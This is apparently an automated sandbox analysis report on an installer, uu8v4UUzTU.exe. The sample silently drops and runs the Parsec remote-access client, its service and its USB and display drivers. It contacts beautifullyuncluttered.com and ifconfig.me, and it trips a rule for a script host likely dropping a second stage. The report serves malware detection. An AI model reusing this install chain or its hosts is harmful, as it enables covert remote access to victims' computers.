Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0y
Source: pservice.exe, 00000027.00000003.2531612650.000001F0112B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl35
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlZy
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlxyI
Source: pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/l
Source: pservice.exe, 00000027.00000003.2537010055.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531231225.000001F011AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: parsec-windows.exe, 0000000D.00000000.2203144262.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002D.00000000.2346150656.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000000.2456937852.000000000040A000.00000008.00000001.01000000.00000017.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pservice.exe, 00000027.00000002.3287466259.000001F011AEC000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138396186.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618126507.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2532225566.000001F011B08000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531045774.000001F011B05000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137536300.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
Source: pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
Source: pservice.exe, 00000027.00000002.3286410998.000001F01124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxL
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138247513.000001F0112F6000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138282207.000001F0112FD000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287538963.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F011270000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
Source: pservice.exe, 00000027.00000002.3287320221.000001F011AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4
Source: pservice.exe, 00000027.00000003.2532225566.000001F011B08000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531045774.000001F011B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comC
Source: pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: pservice.exe, 00000027.00000002.3287357243.000001F011ACC000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138509714.000001F011ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: pservice.exe, 00000027.00000003.2531612650.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: pservice.exe, 00000027.00000003.2532225566.000001F011B08000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531045774.000001F011B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comu
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293815599.000000000374D000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2286699133.0000000003720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293720265.0000000003710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/?CheckApp
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293720265.0000000003710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/
Source: uu8v4UUzTU.tmp, 00000002.00000003.2288649107.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2287035653.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000002.2293088361.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/ip
Source: uu8v4UUzTU.tmp, 00000002.00000003.2288804175.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000002.2292586991.0000000000A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/ip5.1ry
Source: uu8v4UUzTU.exe, is-LQSSJ.tmp.2.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelog
Source: parsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec
Source: parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i
Source: parsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec
Source: uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.innosetup.com/
Source: uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.remobjects.com/ps
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004056DE
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_e31ab961-1
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.cat (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET636D.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET700F.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8A7D.tmpJump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.catJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.catJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.cat (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70CA.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.catJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET612A.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7A720: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,6_2_00F7A720
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3144C0 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,48_2_00007FF72C3144C0
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD031850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle,39_2_00007FF7CD031850
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,13_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,45_2_0040352D
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,65_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem4.inf
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
